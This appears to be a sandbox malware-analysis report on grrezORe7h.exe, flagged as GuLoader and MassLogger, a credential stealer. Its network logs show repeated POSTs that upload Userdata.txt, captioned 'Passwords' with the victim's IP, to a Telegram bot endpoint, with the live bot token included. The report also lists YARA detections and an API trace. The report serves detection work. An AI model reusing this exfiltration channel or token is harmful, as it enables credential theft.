2025-01-11 06:24:52 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43789,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576692,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50062	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:53 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd341919464094 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:53 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 39 31 39 34 36 34 30 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd341919464094Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:54 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:54 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43790,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576694,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50064	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:55 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34357477f033 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:55 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 35 37 34 37 37 66 30 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34357477f033Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:56 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:56 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43791,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576696,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50066	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:58 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34663c8145e3 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:58 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 36 36 33 63 38 31 34 35 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34663c8145e3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:58 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:58 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43792,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576698,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50068	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:59 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd347fcfb3bfa5 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:59 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 37 66 63 66 62 33 62 66 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd347fcfb3bfa5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:59 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:59 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43793,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576699,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50070	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:25:02 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34bcf6e6755f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:25:02 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 62 63 66 36 65 36 37 35 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34bcf6e6755fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:25:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:25:02 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:25:02 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 37 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43794,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576702,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50072	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:25:12 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd35a148fe7d29 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:25:12 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 61 31 34 38 66 65 37 64 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd35a148fe7d29Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:25:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:25:12 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:25:13 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 37 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43795,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576712,"document":{"file_n

Target ID:	0
Start time:	01:23:04
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\grrezORe7h.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\grrezORe7h.exe"
Imagebase:	0x400000
File size:	465'972 bytes
MD5 hash:	FD7D65A4A49C3867970510443C8819D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2135234912.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2135234912.00000000035B7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:23:43
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\grrezORe7h.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\grrezORe7h.exe"
Imagebase:	0x400000
File size:	465'972 bytes
MD5 hash:	FD7D65A4A49C3867970510443C8819D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2989457326.00000000016C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.4%
Dynamic/Decrypted Code Coverage:	13.9%
Signature Coverage:	20.8%
Total number of Nodes:	1517
Total number of Limit Nodes:	46

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\grrezORe7h.exe",00000000), ref: 00403363
CharNextW.USER32(00000000,"C:\Users\user\Desktop\grrezORe7h.exe",00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
DeleteFileW.KERNELBASE(1033), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 0040362B
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 0040363A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 00403645
